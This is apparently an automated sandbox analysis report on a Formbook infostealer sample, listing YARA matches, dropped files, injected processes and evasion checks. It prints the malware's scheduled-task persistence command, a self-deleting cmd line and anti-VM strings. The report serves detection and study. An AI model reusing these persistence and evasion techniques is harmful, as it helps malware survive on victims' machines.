          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B4A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041BD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041BE60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041C603
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053C0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05491D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05492D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054925DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053DD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053D841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0548D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0549DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05491FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053E6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0548D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05492EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053E4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053CF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05481002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0549E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053F20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054928EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053DB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054920A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05492B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053FEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054803DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0548DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054922AE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EDD466
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2841F
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2D5E0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE25DD
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E42581
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE1D55
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E10D20
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE2D07
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE2EF7
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E36E30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EDD616
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE1FF1
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EEDFCE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE28EC
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E420A0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE20A8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2B090
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EEE824
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ED1002
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E34120
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E1F900
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE22AE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ED03DA
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EDDBD2
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4EBB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE2B28
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030F2FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310C603
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030F2D90
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310CC13
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030F8C60
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe 767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 04E1B150 appears 45 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 053CB150 appears 45 times
          Source: J0OmHIagw8.exe | Binary or memory string: OriginalFilename vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.241605025.000000000442C000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242728474.0000000006AF0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe | Binary or memory string: OriginalFilename2 vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: J0OmHIagw8.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: JcEEHoQdnETCO.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs | Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs | Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/3@20/11
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Mutant created: \Sessions\1\BaseNamedObjects\BrtavqaRGzDKtjCLSCLufFEEs
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_01
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File created: C:\Users\user\AppData\Local\Temp\tmpF65F.tmp
Source: J0OmHIagw8.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: J0OmHIagw8.exe | Virustotal: Detection: 31%
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File read: C:\Users\user\Desktop\J0OmHIagw8.exe
Source: unknown | Process created: C:\Users\user\Desktop\J0OmHIagw8.exe 'C:\Users\user\Desktop\J0OmHIagw8.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
Source: unknown | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: J0OmHIagw8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: J0OmHIagw8.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: J0OmHIagw8.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
          Source: Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
          Source: Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp

          Data Obfuscation:

.NET source code contains potential unpacker
Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs | .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0x8C6CE96A [Sat Aug 27 21:58:02 2044 UTC]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041508E push ebp; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0040C2CA push ds; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0040C31A push ds; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004153DF pushad ; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B3B5 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B46C push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B402 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041B40B push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_00414DDA pushfd ; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0040EEAA push esp; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0541D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E6D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030FC31A push ds; retf
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310B3B5 push eax; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031053DF pushad ; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030FC2CA push ds; retf
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310C9C8 push dword ptr [ECF9F4C6h]; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310508E push ebp; iretd
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_030FEEAA push esp; retf
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_03104DDA pushfd ; retf
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310B402 push eax; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310B40B push eax; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310B46C push eax; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.87325624696
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe

          Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: Process Memory Space: J0OmHIagw8.exe PID: 5816, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000030F85E4 second address: 00000000030F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000030F897E second address: 00000000030F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004088B0 rdtsc
Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\J0OmHIagw8.exe TID: 5328 | Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\Desktop\J0OmHIagw8.exe TID: 4112 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6624 | Thread sleep time: -75000s >= -30000s
Source: C:\Windows\SysWOW64\control.exe TID: 6404 | Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\control.exe TID: 6404 | Thread sleep time: -66000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000006.00000000.258703934.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: control.exe, 00000008.00000002.570842629.0000000000D14000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.251327827.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000006.00000000.259244656.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
